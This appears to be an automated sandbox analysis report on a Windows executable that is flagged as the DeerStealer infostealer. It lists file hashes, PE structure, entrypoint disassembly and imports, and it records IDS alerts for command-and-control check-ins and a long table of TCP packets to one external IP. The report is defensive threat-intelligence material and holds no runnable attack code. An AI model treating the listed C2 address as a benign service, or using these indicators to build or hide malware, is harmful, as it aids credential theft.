Preview:	dll..yc[O...qk.m.RX..Lpkb...ES.L.o.m..k.u...U...\ve...Taqbl.Z...K.a........H_..rFV.r_......F.ywv...Q..v.eM...EcK...y\..H..Ql....du.Z..J.]..uVX.Sn..O..d....\.E...A..V..[.J]..TDQ..G...x.u.rMm.Vc..f....lisM.jNNe.c..r[^..m._......G..oNXn.w.SbAU.T...r^R....r..V..OSFv.K.s_ddhQW^.lyt..h.qCN....po\t..DP..UBtUp.L.Q.h..K.c....q.R..t.OVMW.la.bew.^.wi.YQ.ej..Ibd...EO.kJva.xGR..x..sG.X.i....s.xJy.fp..i....^j...N_..\QW^t.i.xmGF\y.N....p..nXg_..b].K.a..P...T.j.q.N.\s.i.Tm..M..u..h...[.T..G.IOXy^QQ..m....R..rL].....J.L.k].de[..kv..G.b..J.bq.SG..gHCX......e.sK.a.SSW.....vF._..x....VGY.J..FCB.s...n.tu`bR...K.TGr.....Y.k.l_]EM.^fBv.E...^yHY...k.Gp..EfL..e....E.Y....Vfl.A.f.vYq.mGa..e...ju.iNV.S...LAM....sfc..]sA..^.......U.m.....P...^.\......W.x..X..njXN_].....o]Y.Km...g_..B...h.A..r.b.o.l.U.......R..wK.fbe.Z.KZm.JW..n.r.Bd..]..[U...e.d..RM.x.L[P.i...q.....F...g.FN..._YY.vJC...jv`a.Ip.N...e..G..SVx..A^......nYCn...p....oxD....mLjL...mq..C.\.dk.....Z.._J.B.AY.u_HR.....KR.r.R.w....WG..Lk.Bg.bn.EBV\..QP.bQq

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.996148375386849
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9mauyKC3JW.exe
File size:	9'118'184 bytes
MD5:	ae130c89b7d8c4c9fd06422faeb79fc9
SHA1:	b5fdcc9e63448dd0f68b75b7bf54ff3fef94623c
SHA256:	b13a4e5207954eaeb6aaf32e333a4f366a86afc0779406c9bf17805d5b83e2e9
SHA512:	650f4d4d383db5e9b9f2cc32bb3d5c74e4f265ec86b311ad715df065cd9f00ba38be2d37cdb8b6adf955c39eafbf616bb1dac159baac2b93cbe5e45b2b931def
SSDEEP:	196608:+pNmeBG+ftWTWNkP6H+j/H0fiHF9FcaWmLOtgyd90PC9rK/prrKD36:+pNmWG+lMJP/r0KHrFcaWmytpdePC9Dm
TLSH:	4E9633903345F4FAE136E5B62F7C87A242B5DE4926810F4FA7A60E1F1EC2BD1950B0D6
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.............................

File Icon


Icon Hash:	d292fcd8f2f2fe1c

Static PE Info

General

Entrypoint:	0x411def
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b5a014d7eeb4c2042897567e1288a095

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007FCB65041B82h
cmp dword ptr [00417710h], ebx
jne 00007FCB65041A6Eh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007FCB65041B54h
push 00417048h
push 00417044h
call 00007FCB65041B3Fh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007FCB65041B0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150dc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x18d04	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x310	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11317	0x11400	797279c5ab1a163aed1f2a528f9fe3ce	False	0.6174988677536232	data	6.576987441854239	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x30ea	0x3200	1359639b02bcb8f0a8743e6ead1c0030	False	0.43828125	data	5.549434098115495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x292c	0x800	9415c9c8dea3245d6d73c23393e27d8e	False	0.431640625	data	3.6583182363171756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x18d04	0x18e00	9dee09854e79aa987e5336a4defda540	False	0.2433358197236181	data	5.382874846103129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a1f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.6781914893617021
RT_ICON	0x1a658	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.47068480300187615
RT_ICON	0x1b700	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.41161825726141077
RT_ICON	0x1dca8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.3213863958431743
RT_ICON	0x21ed0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Russian	Russia	0.1865609842659411
RT_GROUP_ICON	0x326f8	0x4c	data	Russian	Russia	0.7763157894736842
RT_VERSION	0x32744	0x350	data	English	United States	0.47523584905660377
RT_MANIFEST	0x32a94	0x270	ASCII text, with very long lines (624), with no line terminators	English	United States	0.5144230769230769

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll	CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll	GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll	SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll	CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll	VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll	__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T08:15:52.621984+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49711	172.67.153.243	443	TCP
2024-12-27T08:15:53.549685+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.8	49711	172.67.153.243	443	TCP
2024-12-27T08:15:55.284043+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49713	172.67.153.243	443	TCP
2024-12-27T08:15:57.338216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	172.67.153.243	443	TCP
2024-12-27T08:16:05.356520+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49716	172.67.153.243	443	TCP
2024-12-27T08:16:08.819571+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49717	172.67.153.243	443	TCP
2024-12-27T08:16:10.842099+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49718	172.67.153.243	443	TCP
2024-12-27T08:16:12.781810+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49719	172.67.153.243	443	TCP
2024-12-27T08:16:14.704165+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49720	172.67.153.243	443	TCP
2024-12-27T08:16:17.109798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49721	172.67.153.243	443	TCP
2024-12-27T08:16:19.577127+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49722	172.67.153.243	443	TCP
2024-12-27T08:16:23.630281+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49723	172.67.153.243	443	TCP
2024-12-27T08:16:24.333173+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.8	49723	172.67.153.243	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:15:51.266072035 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:51.266136885 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:51.266196966 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:51.267795086 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:51.267812967 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:52.621258974 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:52.621984005 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:52.624870062 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:52.624886036 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:52.625155926 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:52.668507099 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:52.669495106 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:52.669537067 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:52.669639111 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.549719095 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.553225994 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.553286076 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.553369045 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.553452015 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.553502083 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.553518057 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.561297894 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.561347008 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.561363935 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.569998026 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.570051908 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.570067883 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.578250885 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.578303099 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.578318119 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.621512890 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.669044018 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.715255976 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.715291977 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.762120962 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.763892889 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.767860889 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.767914057 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.767931938 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.776133060 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.776190042 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.776221037 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.784209967 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.784265041 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.784281969 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.792412043 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.792464018 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.792478085 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.800463915 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.800514936 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.800530910 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.808715105 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.808773041 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.808790922 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.815157890 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.815231085 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.815241098 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.815274954 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.815347910 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.815423965 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.821708918 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.821763039 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.821780920 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.828175068 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.828226089 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.828243017 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.841034889 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.841089964 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.841114044 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.846920013 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.846971035 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.846988916 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.853403091 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.853460073 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.853478909 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.902751923 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.974096060 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.977186918 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.977251053 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.977281094 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.977320910 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.986399889 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.986407995 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.986463070 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:53.995652914 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.995660067 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:53.995714903 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.000308990 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.000355959 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.000386953 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.000416040 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.000457048 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.000510931 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.000557899 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.000627041 CET	49711	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.000646114 CET	443	49711	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.063123941 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.063216925 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:54.063288927 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.063580990 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:54.063615084 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.283950090 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.284043074 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.285485983 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.285511017 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.285804033 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.286915064 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.286963940 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.286971092 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.895854950 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.895945072 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:55.896106958 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.939452887 CET	49713	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:55.939491034 CET	443	49713	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:56.032913923 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:56.033035040 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:56.033163071 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:56.033544064 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:56.033581972 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:57.338087082 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:57.338216066 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:57.346563101 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:57.346612930 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:57.346962929 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:57.347718000 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:57.347784996 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:57.347795963 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:58.033941984 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:58.034007072 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:58.034069061 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:58.047130108 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:58.047159910 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:15:58.047195911 CET	49714	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:15:58.047203064 CET	443	49714	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:04.097177982 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:04.097254038 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:04.097317934 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:04.097738981 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:04.097754002 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.356442928 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.356519938 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.357762098 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.357775927 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.358004093 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.358979940 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.359885931 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.359921932 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360018015 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360053062 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360155106 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360179901 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360289097 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360320091 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360440969 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360470057 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360615969 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360641003 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360649109 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360652924 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360780954 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360802889 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.360826015 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360955954 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.360975981 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.407326937 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.407540083 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.407592058 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.407620907 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.451380014 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.451677084 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.451775074 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.451869965 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.495353937 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:05.495440960 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:05.539361000 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.403255939 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.403337002 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.403408051 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:07.403558016 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:07.403589964 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.403604984 CET	49716	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:07.403610945 CET	443	49716	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.450630903 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:07.450683117 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:07.450762033 CET	49717	443	192.168.2.8	172.67.153.243
